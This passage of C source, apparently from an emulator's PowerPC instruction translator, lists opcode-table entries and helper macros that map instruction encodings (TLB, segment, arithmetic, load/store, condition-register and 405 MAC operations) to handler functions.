PPC_ALTIVEC), GEN_HANDLER(icbi, 0x1F, 0x16, 0x1E, 0x03E00001, PPC_CACHE_ICBI), GEN_HANDLER_E(icbiep, 0x1F, 0x1F, 0x1E, 0x03E00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcba, 0x1F, 0x16, 0x17, 0x03E00001, PPC_CACHE_DCBA), GEN_HANDLER(mfsr, 0x1F, 0x13, 0x12, 0x0010F801, PPC_SEGMENT), GEN_HANDLER(mfsrin, 0x1F, 0x13, 0x14, 0x001F0001, PPC_SEGMENT), GEN_HANDLER(mtsr, 0x1F, 0x12, 0x06, 0x0010F801, PPC_SEGMENT), GEN_HANDLER(mtsrin, 0x1F, 0x12, 0x07, 0x001F0001, PPC_SEGMENT), #if defined(TARGET_PPC64) GEN_HANDLER2(mfsr_64b, "mfsr", 0x1F, 0x13, 0x12, 0x0010F801, PPC_SEGMENT_64B), GEN_HANDLER2(mfsrin_64b, "mfsrin", 0x1F, 0x13, 0x14, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(mtsr_64b, "mtsr", 0x1F, 0x12, 0x06, 0x0010F801, PPC_SEGMENT_64B), GEN_HANDLER2(mtsrin_64b, "mtsrin", 0x1F, 0x12, 0x07, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbmte, "slbmte", 0x1F, 0x12, 0x0C, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbmfee, "slbmfee", 0x1F, 0x13, 0x1C, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbmfev, "slbmfev", 0x1F, 0x13, 0x1A, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbfee_, "slbfee.", 0x1F, 0x13, 0x1E, 0x001F0000, PPC_SEGMENT_64B), #endif GEN_HANDLER(tlbia, 0x1F, 0x12, 0x0B, 0x03FFFC01, PPC_MEM_TLBIA), /* * XXX Those instructions will need to be handled differently for * different ISA versions */ GEN_HANDLER(tlbiel, 0x1F, 0x12, 0x08, 0x001F0001, PPC_MEM_TLBIE), GEN_HANDLER(tlbie, 0x1F, 0x12, 0x09, 0x001F0001, PPC_MEM_TLBIE), GEN_HANDLER_E(tlbiel, 0x1F, 0x12, 0x08, 0x00100001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(tlbie, 0x1F, 0x12, 0x09, 0x00100001, PPC_NONE, PPC2_ISA300), GEN_HANDLER(tlbsync, 0x1F, 0x16, 0x11, 0x03FFF801, PPC_MEM_TLBSYNC), #if defined(TARGET_PPC64) GEN_HANDLER(slbia, 0x1F, 0x12, 0x0F, 0x031FFC01, PPC_SLBI), GEN_HANDLER(slbie, 0x1F, 0x12, 0x0D, 0x03FF0001, PPC_SLBI), GEN_HANDLER_E(slbieg, 0x1F, 0x12, 0x0E, 0x001F0001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(slbsync, 0x1F, 0x12, 0x0A, 0x03FFF801, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER(eciwx, 0x1F, 0x16, 0x0D, 0x00000001, PPC_EXTERN), GEN_HANDLER(ecowx, 0x1F, 0x16, 0x09, 0x00000001, PPC_EXTERN), GEN_HANDLER(abs, 0x1F, 0x08, 0x0B, 0x0000F800, PPC_POWER_BR), GEN_HANDLER(abso, 0x1F, 0x08, 0x1B, 0x0000F800, PPC_POWER_BR), GEN_HANDLER(clcs, 0x1F, 0x10, 0x13, 0x0000F800, PPC_POWER_BR), GEN_HANDLER(div, 0x1F, 0x0B, 0x0A, 0x00000000, PPC_POWER_BR), GEN_HANDLER(divo, 0x1F, 0x0B, 0x1A, 0x00000000, PPC_POWER_BR), GEN_HANDLER(divs, 0x1F, 0x0B, 0x0B, 0x00000000, PPC_POWER_BR), GEN_HANDLER(divso, 0x1F, 0x0B, 0x1B, 0x00000000, PPC_POWER_BR), GEN_HANDLER(doz, 0x1F, 0x08, 0x08, 0x00000000, PPC_POWER_BR), GEN_HANDLER(dozo, 0x1F, 0x08, 0x18, 0x00000000, PPC_POWER_BR), GEN_HANDLER(dozi, 0x09, 0xFF, 0xFF, 0x00000000, PPC_POWER_BR), GEN_HANDLER(lscbx, 0x1F, 0x15, 0x08, 0x00000000, PPC_POWER_BR), GEN_HANDLER(maskg, 0x1F, 0x1D, 0x00, 0x00000000, PPC_POWER_BR), GEN_HANDLER(maskir, 0x1F, 0x1D, 0x10, 0x00000000, PPC_POWER_BR), GEN_HANDLER(mul, 0x1F, 0x0B, 0x03, 0x00000000, PPC_POWER_BR), GEN_HANDLER(mulo, 0x1F, 0x0B, 0x13, 0x00000000, PPC_POWER_BR), GEN_HANDLER(nabs, 0x1F, 0x08, 0x0F, 0x00000000, PPC_POWER_BR), GEN_HANDLER(nabso, 0x1F, 0x08, 0x1F, 0x00000000, PPC_POWER_BR), GEN_HANDLER(rlmi, 0x16, 0xFF, 0xFF, 0x00000000, PPC_POWER_BR), GEN_HANDLER(rrib, 0x1F, 0x19, 0x10, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sle, 0x1F, 0x19, 0x04, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sleq, 0x1F, 0x19, 0x06, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sliq, 0x1F, 0x18, 0x05, 0x00000000, PPC_POWER_BR), GEN_HANDLER(slliq, 0x1F, 0x18, 0x07, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sllq, 0x1F, 0x18, 0x06, 0x00000000, PPC_POWER_BR), GEN_HANDLER(slq, 0x1F, 0x18, 0x04, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sraiq, 0x1F, 0x18, 0x1D, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sraq, 0x1F, 0x18, 0x1C, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sre, 0x1F, 0x19, 0x14, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srea, 0x1F, 0x19, 0x1C, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sreq, 0x1F, 0x19, 0x16, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sriq, 0x1F, 0x18, 0x15, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srliq, 0x1F, 0x18, 0x17, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srlq, 0x1F, 0x18, 0x16, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srq, 0x1F, 0x18, 0x14, 0x00000000, PPC_POWER_BR), GEN_HANDLER(dsa, 0x1F, 0x14, 0x13, 0x03FFF801, PPC_602_SPEC), GEN_HANDLER(esa, 0x1F, 0x14, 0x12, 0x03FFF801, PPC_602_SPEC), GEN_HANDLER(mfrom, 0x1F, 0x09, 0x08, 0x03E0F801, PPC_602_SPEC), GEN_HANDLER2(tlbld_6xx, "tlbld", 0x1F, 0x12, 0x1E, 0x03FF0001, PPC_6xx_TLB), GEN_HANDLER2(tlbli_6xx, "tlbli", 0x1F, 0x12, 0x1F, 0x03FF0001, PPC_6xx_TLB), GEN_HANDLER2(tlbld_74xx, "tlbld", 0x1F, 0x12, 0x1E, 0x03FF0001, PPC_74xx_TLB), GEN_HANDLER2(tlbli_74xx, "tlbli", 0x1F, 0x12, 0x1F, 0x03FF0001, PPC_74xx_TLB), GEN_HANDLER(clf, 0x1F, 0x16, 0x03, 0x03E00000, PPC_POWER), GEN_HANDLER(cli, 0x1F, 0x16, 0x0F, 0x03E00000, PPC_POWER), GEN_HANDLER(dclst, 0x1F, 0x16, 0x13, 0x03E00000, PPC_POWER), GEN_HANDLER(mfsri, 0x1F, 0x13, 0x13, 0x00000001, PPC_POWER), GEN_HANDLER(rac, 0x1F, 0x12, 0x19, 0x00000001, PPC_POWER), GEN_HANDLER(rfsvc, 0x13, 0x12, 0x02, 0x03FFF0001, PPC_POWER), GEN_HANDLER(lfq, 0x38, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(lfqu, 0x39, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(lfqux, 0x1F, 0x17, 0x19, 0x00000001, PPC_POWER2), GEN_HANDLER(lfqx, 0x1F, 0x17, 0x18, 0x00000001, PPC_POWER2), GEN_HANDLER(stfq, 0x3C, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(stfqu, 0x3D, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(stfqux, 0x1F, 0x17, 0x1D, 0x00000001, PPC_POWER2), GEN_HANDLER(stfqx, 0x1F, 0x17, 0x1C, 0x00000001, PPC_POWER2), GEN_HANDLER(mfapidi, 0x1F, 0x13, 0x08, 0x0000F801, PPC_MFAPIDI), GEN_HANDLER(tlbiva, 0x1F, 0x12, 0x18, 0x03FFF801, PPC_TLBIVA), GEN_HANDLER(mfdcr, 0x1F, 0x03, 0x0A, 0x00000001, PPC_DCR), GEN_HANDLER(mtdcr, 0x1F, 0x03, 0x0E, 0x00000001, PPC_DCR), GEN_HANDLER(mfdcrx, 0x1F, 0x03, 0x08, 0x00000000, PPC_DCRX), GEN_HANDLER(mtdcrx, 0x1F, 0x03, 0x0C, 0x00000000, PPC_DCRX), GEN_HANDLER(mfdcrux, 0x1F, 0x03, 0x09, 0x00000000, PPC_DCRUX), GEN_HANDLER(mtdcrux, 0x1F, 0x03, 0x0D, 0x00000000, PPC_DCRUX), GEN_HANDLER(dccci, 0x1F, 0x06, 0x0E, 0x03E00001, PPC_4xx_COMMON), GEN_HANDLER(dcread, 0x1F, 0x06, 0x0F, 0x00000001, PPC_4xx_COMMON), GEN_HANDLER2(icbt_40x, "icbt", 0x1F, 0x06, 0x08, 0x03E00001, PPC_40x_ICBT), GEN_HANDLER(iccci, 0x1F, 0x06, 0x1E, 0x00000001, PPC_4xx_COMMON), GEN_HANDLER(icread, 0x1F, 0x06, 0x1F, 0x03E00001, PPC_4xx_COMMON), GEN_HANDLER2(rfci_40x, "rfci", 0x13, 0x13, 0x01, 0x03FF8001, PPC_40x_EXCP), GEN_HANDLER_E(rfci, 0x13, 0x13, 0x01, 0x03FF8001, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER(rfdi, 0x13, 0x07, 0x01, 0x03FF8001, PPC_RFDI), GEN_HANDLER(rfmci, 0x13, 0x06, 0x01, 0x03FF8001, PPC_RFMCI), GEN_HANDLER2(tlbre_40x, "tlbre", 0x1F, 0x12, 0x1D, 0x00000001, PPC_40x_TLB), GEN_HANDLER2(tlbsx_40x, "tlbsx", 0x1F, 0x12, 0x1C, 0x00000000, PPC_40x_TLB), GEN_HANDLER2(tlbwe_40x, "tlbwe", 0x1F, 0x12, 0x1E, 0x00000001, PPC_40x_TLB), GEN_HANDLER2(tlbre_440, "tlbre", 0x1F, 0x12, 0x1D, 0x00000001, PPC_BOOKE), GEN_HANDLER2(tlbsx_440, "tlbsx", 0x1F, 0x12, 0x1C, 0x00000000, PPC_BOOKE), GEN_HANDLER2(tlbwe_440, "tlbwe", 0x1F, 0x12, 0x1E, 0x00000001, PPC_BOOKE), GEN_HANDLER2_E(tlbre_booke206, "tlbre", 0x1F, 0x12, 0x1D, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbsx_booke206, "tlbsx", 0x1F, 0x12, 0x1C, 0x00000000, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbwe_booke206, "tlbwe", 0x1F, 0x12, 0x1E, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbivax_booke206, "tlbivax", 0x1F, 0x12, 0x18, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbilx_booke206, "tlbilx", 0x1F, 0x12, 0x00, 0x03800001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(msgsnd, "msgsnd", 0x1F, 0x0E, 0x06, 0x03ff0001, PPC_NONE, PPC2_PRCNTL), GEN_HANDLER2_E(msgclr, "msgclr", 0x1F, 0x0E, 0x07, 0x03ff0001, PPC_NONE, PPC2_PRCNTL), GEN_HANDLER2_E(msgsync, "msgsync", 0x1F, 0x16, 0x1B, 0x00000000, PPC_NONE, PPC2_PRCNTL), GEN_HANDLER(wrtee, 0x1F, 0x03, 0x04, 0x000FFC01, PPC_WRTEE), GEN_HANDLER(wrteei, 0x1F, 0x03, 0x05, 0x000E7C01, PPC_WRTEE), GEN_HANDLER(dlmzb, 0x1F, 0x0E, 0x02, 0x00000000, PPC_440_SPEC), GEN_HANDLER_E(mbar, 0x1F, 0x16, 0x1a, 0x001FF801, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER(msync_4xx, 0x1F, 0x16, 0x12, 0x039FF801, PPC_BOOKE), GEN_HANDLER2_E(icbt_440, "icbt", 0x1F, 0x16, 0x00, 0x03E00001, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER2(icbt_440, "icbt", 0x1F, 0x06, 0x08, 0x03E00001, PPC_440_SPEC), GEN_HANDLER(lvsl, 0x1f, 0x06, 0x00, 0x00000001, PPC_ALTIVEC), GEN_HANDLER(lvsr, 0x1f, 0x06, 0x01, 0x00000001, PPC_ALTIVEC), GEN_HANDLER(mfvscr, 0x04, 0x2, 0x18, 0x001ff800, PPC_ALTIVEC), GEN_HANDLER(mtvscr, 0x04, 0x2, 0x19, 0x03ff0000, PPC_ALTIVEC), GEN_HANDLER(vmladduhm, 0x04, 0x11, 0xFF, 0x00000000, PPC_ALTIVEC), #if defined(TARGET_PPC64) GEN_HANDLER_E(maddhd_maddhdu, 0x04, 0x18, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(maddld, 0x04, 0x19, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER2_E(msgsndp, "msgsndp", 0x1F, 0x0E, 0x04, 0x03ff0001, PPC_NONE, PPC2_ISA207S), GEN_HANDLER2_E(msgclrp, "msgclrp", 0x1F, 0x0E, 0x05, 0x03ff0001, PPC_NONE, PPC2_ISA207S), #endif #undef GEN_INT_ARITH_ADD #undef GEN_INT_ARITH_ADD_CONST #define GEN_INT_ARITH_ADD(name, opc3, add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x0A, opc3, 0x00000000, PPC_INTEGER), #define GEN_INT_ARITH_ADD_CONST(name, opc3, const_val, \ add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x0A, opc3, 0x0000F800, PPC_INTEGER), GEN_INT_ARITH_ADD(add, 0x08, 0, 0, 0) GEN_INT_ARITH_ADD(addo, 0x18, 0, 0, 1) GEN_INT_ARITH_ADD(addc, 0x00, 0, 1, 0) GEN_INT_ARITH_ADD(addco, 0x10, 0, 1, 1) GEN_INT_ARITH_ADD(adde, 0x04, 1, 1, 0) GEN_INT_ARITH_ADD(addeo, 0x14, 1, 1, 1) GEN_INT_ARITH_ADD_CONST(addme, 0x07, -1LL, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addmeo, 0x17, -1LL, 1, 1, 1) GEN_HANDLER_E(addex, 0x1F, 0x0A, 0x05, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_INT_ARITH_ADD_CONST(addze, 0x06, 0, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addzeo, 0x16, 0, 1, 1, 1) #undef GEN_INT_ARITH_DIVW #define GEN_INT_ARITH_DIVW(name, opc3, sign, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x0B, opc3, 0x00000000, PPC_INTEGER) GEN_INT_ARITH_DIVW(divwu, 0x0E, 0, 0), GEN_INT_ARITH_DIVW(divwuo, 0x1E, 0, 1), GEN_INT_ARITH_DIVW(divw, 0x0F, 1, 0), GEN_INT_ARITH_DIVW(divwo, 0x1F, 1, 1), GEN_HANDLER_E(divwe, 0x1F, 0x0B, 0x0D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divweo, 0x1F, 0x0B, 0x1D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divweu, 0x1F, 0x0B, 0x0C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divweuo, 0x1F, 0x0B, 0x1C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(modsw, 0x1F, 0x0B, 0x18, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(moduw, 0x1F, 0x0B, 0x08, 0x00000001, PPC_NONE, PPC2_ISA300), #if defined(TARGET_PPC64) #undef GEN_INT_ARITH_DIVD #define GEN_INT_ARITH_DIVD(name, opc3, sign, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x09, opc3, 0x00000000, PPC_64B) GEN_INT_ARITH_DIVD(divdu, 0x0E, 0, 0), GEN_INT_ARITH_DIVD(divduo, 0x1E, 0, 1), GEN_INT_ARITH_DIVD(divd, 0x0F, 1, 0), GEN_INT_ARITH_DIVD(divdo, 0x1F, 1, 1), GEN_HANDLER_E(divdeu, 0x1F, 0x09, 0x0C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divdeuo, 0x1F, 0x09, 0x1C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divde, 0x1F, 0x09, 0x0D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divdeo, 0x1F, 0x09, 0x1D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(modsd, 0x1F, 0x09, 0x18, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(modud, 0x1F, 0x09, 0x08, 0x00000001, PPC_NONE, PPC2_ISA300), #undef GEN_INT_ARITH_MUL_HELPER #define GEN_INT_ARITH_MUL_HELPER(name, opc3) \ GEN_HANDLER(name, 0x1F, 0x09, opc3, 0x00000000, PPC_64B) GEN_INT_ARITH_MUL_HELPER(mulhdu, 0x00), GEN_INT_ARITH_MUL_HELPER(mulhd, 0x02), GEN_INT_ARITH_MUL_HELPER(mulldo, 0x17), #endif #undef GEN_INT_ARITH_SUBF #undef GEN_INT_ARITH_SUBF_CONST #define GEN_INT_ARITH_SUBF(name, opc3, add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x08, opc3, 0x00000000, PPC_INTEGER), #define GEN_INT_ARITH_SUBF_CONST(name, opc3, const_val, \ add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x08, opc3, 0x0000F800, PPC_INTEGER), GEN_INT_ARITH_SUBF(subf, 0x01, 0, 0, 0) GEN_INT_ARITH_SUBF(subfo, 0x11, 0, 0, 1) GEN_INT_ARITH_SUBF(subfc, 0x00, 0, 1, 0) GEN_INT_ARITH_SUBF(subfco, 0x10, 0, 1, 1) GEN_INT_ARITH_SUBF(subfe, 0x04, 1, 1, 0) GEN_INT_ARITH_SUBF(subfeo, 0x14, 1, 1, 1) GEN_INT_ARITH_SUBF_CONST(subfme, 0x07, -1LL, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfmeo, 0x17, -1LL, 1, 1, 1) GEN_INT_ARITH_SUBF_CONST(subfze, 0x06, 0, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfzeo, 0x16, 0, 1, 1, 1) #undef GEN_LOGICAL1 #undef GEN_LOGICAL2 #define GEN_LOGICAL2(name, tcg_op, opc, type) \ GEN_HANDLER(name, 0x1F, 0x1C, opc, 0x00000000, type) #define GEN_LOGICAL1(name, tcg_op, opc, type) \ GEN_HANDLER(name, 0x1F, 0x1A, opc, 0x00000000, type) GEN_LOGICAL2(and, tcg_gen_and_tl, 0x00, PPC_INTEGER), GEN_LOGICAL2(andc, tcg_gen_andc_tl, 0x01, PPC_INTEGER), GEN_LOGICAL2(eqv, tcg_gen_eqv_tl, 0x08, PPC_INTEGER), GEN_LOGICAL1(extsb, tcg_gen_ext8s_tl, 0x1D, PPC_INTEGER), GEN_LOGICAL1(extsh, tcg_gen_ext16s_tl, 0x1C, PPC_INTEGER), GEN_LOGICAL2(nand, tcg_gen_nand_tl, 0x0E, PPC_INTEGER), GEN_LOGICAL2(nor, tcg_gen_nor_tl, 0x03, PPC_INTEGER), GEN_LOGICAL2(orc, tcg_gen_orc_tl, 0x0C, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_LOGICAL1(extsw, tcg_gen_ext32s_tl, 0x1E, PPC_64B), #endif #if defined(TARGET_PPC64) #undef GEN_PPC64_R2 #undef GEN_PPC64_R4 #define GEN_PPC64_R2(name, opc1, opc2) \ GEN_HANDLER2(name##0, stringify(name), opc1, opc2, 0xFF, 0x00000000, PPC_64B),\ GEN_HANDLER2(name##1, stringify(name), opc1, opc2 | 0x10, 0xFF, 0x00000000, \ PPC_64B) #define GEN_PPC64_R4(name, opc1, opc2) \ GEN_HANDLER2(name##0, stringify(name), opc1, opc2, 0xFF, 0x00000000, PPC_64B),\ GEN_HANDLER2(name##1, stringify(name), opc1, opc2 | 0x01, 0xFF, 0x00000000, \ PPC_64B), \ GEN_HANDLER2(name##2, stringify(name), opc1, opc2 | 0x10, 0xFF, 0x00000000, \ PPC_64B), \ GEN_HANDLER2(name##3, stringify(name), opc1, opc2 | 0x11, 0xFF, 0x00000000, \ PPC_64B) GEN_PPC64_R4(rldicl, 0x1E, 0x00), GEN_PPC64_R4(rldicr, 0x1E, 0x02), GEN_PPC64_R4(rldic, 0x1E, 0x04), GEN_PPC64_R2(rldcl, 0x1E, 0x08), GEN_PPC64_R2(rldcr, 0x1E, 0x09), GEN_PPC64_R4(rldimi, 0x1E, 0x06), #endif #undef GEN_LD #undef GEN_LDU #undef GEN_LDUX #undef GEN_LDX_E #undef GEN_LDS #define GEN_LD(name, ldop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDU(name, ldop, opc, type) \ GEN_HANDLER(name##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDUX(name, ldop, opc2, opc3, type) \ GEN_HANDLER(name##ux, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_LDX_E(name, ldop, opc2, opc3, type, type2, chk) \ GEN_HANDLER_E(name##x, 0x1F, opc2, opc3, 0x00000001, type, type2), #define GEN_LDS(name, ldop, op, type) \ GEN_LD(name, ldop, op | 0x20, type) \ GEN_LDU(name, ldop, op | 0x21, type) \ GEN_LDUX(name, ldop, 0x17, op | 0x01, type) \ GEN_LDX(name, ldop, 0x17, op | 0x00, type) GEN_LDS(lbz, ld8u, 0x02, PPC_INTEGER) GEN_LDS(lha, ld16s, 0x0A, PPC_INTEGER) GEN_LDS(lhz, ld16u, 0x08, PPC_INTEGER) GEN_LDS(lwz, ld32u, 0x00, PPC_INTEGER) #if defined(TARGET_PPC64) GEN_LDUX(lwa, ld32s, 0x15, 0x0B, PPC_64B) GEN_LDX(lwa, ld32s, 0x15, 0x0A, PPC_64B) GEN_LDUX(ld, ld64_i64, 0x15, 0x01, PPC_64B) GEN_LDX(ld, ld64_i64, 0x15, 0x00, PPC_64B) GEN_LDX_E(ldbr, ld64ur_i64, 0x14, 0x10, PPC_NONE, PPC2_DBRX, CHK_NONE) /* HV/P7 and later only */ GEN_LDX_HVRM(ldcix, ld64_i64, 0x15, 0x1b, PPC_CILDST) GEN_LDX_HVRM(lwzcix, ld32u, 0x15, 0x18, PPC_CILDST) GEN_LDX_HVRM(lhzcix, ld16u, 0x15, 0x19, PPC_CILDST) GEN_LDX_HVRM(lbzcix, ld8u, 0x15, 0x1a, PPC_CILDST) #endif GEN_LDX(lhbr, ld16ur, 0x16, 0x18, PPC_INTEGER) GEN_LDX(lwbr, ld32ur, 0x16, 0x10, PPC_INTEGER) /* External PID based load */ #undef GEN_LDEPX #define GEN_LDEPX(name, ldop, opc2, opc3) \ GEN_HANDLER_E(name##epx, 0x1F, opc2, opc3, \ 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_LDEPX(lb, DEF_MEMOP(MO_UB), 0x1F, 0x02) GEN_LDEPX(lh, DEF_MEMOP(MO_UW), 0x1F, 0x08) GEN_LDEPX(lw, DEF_MEMOP(MO_UL), 0x1F, 0x00) #if defined(TARGET_PPC64) GEN_LDEPX(ld, DEF_MEMOP(MO_Q), 0x1D, 0x00) #endif #undef GEN_ST #undef GEN_STU #undef GEN_STUX #undef GEN_STX_E #undef GEN_STS #define GEN_ST(name, stop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STU(name, stop, opc, type) \ GEN_HANDLER(stop##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STUX(name, stop, opc2, opc3, type) \ GEN_HANDLER(name##ux, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_STX_E(name, stop, opc2, opc3, type, type2, chk) \ GEN_HANDLER_E(name##x, 0x1F, opc2, opc3, 0x00000000, type, type2), #define GEN_STS(name, stop, op, type) \ GEN_ST(name, stop, op | 0x20, type) \ GEN_STU(name, stop, op | 0x21, type) \ GEN_STUX(name, stop, 0x17, op | 0x01, type) \ GEN_STX(name, stop, 0x17, op | 0x00, type) GEN_STS(stb, st8, 0x06, PPC_INTEGER) GEN_STS(sth, st16, 0x0C, PPC_INTEGER) GEN_STS(stw, st32, 0x04, PPC_INTEGER) #if defined(TARGET_PPC64) GEN_STUX(std, st64_i64, 0x15, 0x05, PPC_64B) GEN_STX(std, st64_i64, 0x15, 0x04, PPC_64B) GEN_STX_E(stdbr, st64r_i64, 0x14, 0x14, PPC_NONE, PPC2_DBRX, CHK_NONE) GEN_STX_HVRM(stdcix, st64_i64, 0x15, 0x1f, PPC_CILDST) GEN_STX_HVRM(stwcix, st32, 0x15, 0x1c, PPC_CILDST) GEN_STX_HVRM(sthcix, st16, 0x15, 0x1d, PPC_CILDST) GEN_STX_HVRM(stbcix, st8, 0x15, 0x1e, PPC_CILDST) #endif GEN_STX(sthbr, st16r, 0x16, 0x1C, PPC_INTEGER) GEN_STX(stwbr, st32r, 0x16, 0x14, PPC_INTEGER) #undef GEN_STEPX #define GEN_STEPX(name, ldop, opc2, opc3) \ GEN_HANDLER_E(name##epx, 0x1F, opc2, opc3, \ 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_STEPX(stb, DEF_MEMOP(MO_UB), 0x1F, 0x06) GEN_STEPX(sth, DEF_MEMOP(MO_UW), 0x1F, 0x0C) GEN_STEPX(stw, DEF_MEMOP(MO_UL), 0x1F, 0x04) #if defined(TARGET_PPC64) GEN_STEPX(std, DEF_MEMOP(MO_Q), 0x1D, 0x04) #endif #undef GEN_CRLOGIC #define GEN_CRLOGIC(name, tcg_op, opc) \ GEN_HANDLER(name, 0x13, 0x01, opc, 0x00000001, PPC_INTEGER) GEN_CRLOGIC(crand, tcg_gen_and_i32, 0x08), GEN_CRLOGIC(crandc, tcg_gen_andc_i32, 0x04), GEN_CRLOGIC(creqv, tcg_gen_eqv_i32, 0x09), GEN_CRLOGIC(crnand, tcg_gen_nand_i32, 0x07), GEN_CRLOGIC(crnor, tcg_gen_nor_i32, 0x01), GEN_CRLOGIC(cror, tcg_gen_or_i32, 0x0E), GEN_CRLOGIC(crorc, tcg_gen_orc_i32, 0x0D), GEN_CRLOGIC(crxor, tcg_gen_xor_i32, 0x06), #undef GEN_MAC_HANDLER #define GEN_MAC_HANDLER(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_405_MAC) GEN_MAC_HANDLER(macchw, 0x0C, 0x05), GEN_MAC_HANDLER(macchwo, 0x0C, 0x15), GEN_MAC_HANDLER(macchws, 0x0C, 0x07), GEN_MAC_HANDLER(macchwso, 0x0C, 0x17), GEN_MAC_HANDLER(macchwsu, 0x0C, 0x06), GEN_MAC_HANDLER(macchwsuo, 0x0C, 0x16), GEN_MAC_HANDLER(macchwu, 0x0C, 0x04), GEN_MAC_HANDLER(macchwuo, 0x0C, 0x14), GEN_MAC_HANDLER(machhw, 0x0C, 0x01), GEN_MAC_HANDLER(machhwo, 0x0C, 0x11), GEN_MAC_HANDLER(machhws, 0x0C, 0x03), GEN_MAC_HANDLER(machhwso, 0x0C, 0x13), GEN_MAC_HANDLER(machhwsu, 0x0C, 0x02), GEN_MAC_HANDLER(machhwsuo, 0x0C, 0x12), GEN_MAC_HANDLER(machhwu, 0x0C, 0x00), GEN_MAC_HANDLER(machhwuo, 0x0C, 0x10), GEN_MAC_HANDLER(maclhw, 0x0C, 0x0D), GEN_MAC_HANDLER(maclhwo, 0x0C, 0x1D), GEN_MAC_HANDLER(maclhws, 0x0C, 0x0F), GEN_MAC_HANDLER(maclhwso, 0x0C, 0x1F), GEN_MAC_HANDLER(maclhwu, 0x0C, 0x0C), GEN_MAC_HANDLER(maclhwuo, 0x0C, 0x1C), GEN_MAC_HANDLER(maclhwsu, 0x0C, 0x0E), GEN_MAC_HANDLER(maclhwsuo, 0x0C, 0x1E), GEN_MAC_HANDLER(nmacchw, 0x0E, 0x05), GEN_MAC_HANDLER(nmacchwo, 0x0E, 0x15), GEN_MAC_HANDLER(nmacchws, 0x0E, 0x07), GEN_MAC_HANDLER(nmacchwso, 0x0E, 0x17), GEN_MAC_HANDLER(nmachhw, 0x0E, 0x01), GEN_MAC_HANDLER(nmachhwo, 0x0E, 0x11), GEN_MAC_HANDLER(nmachhws, 0x0E, 0x03), GEN_MAC_HANDLER(nmachhwso, 0x0E, 0x13), GEN_MAC_HANDLER(nmaclhw, 0x0E, 0x0D), GEN_MAC_HANDLER(nmaclhwo, 0x0E, 0x1D), GEN_MAC_HANDLER(nmaclhws, 0x0E, 0x0F), GEN_MAC_HANDLER(nmaclhwso, 0x0E, 0x1F), GEN_MAC_HANDLER(mulchw, 0x08, 0x05), 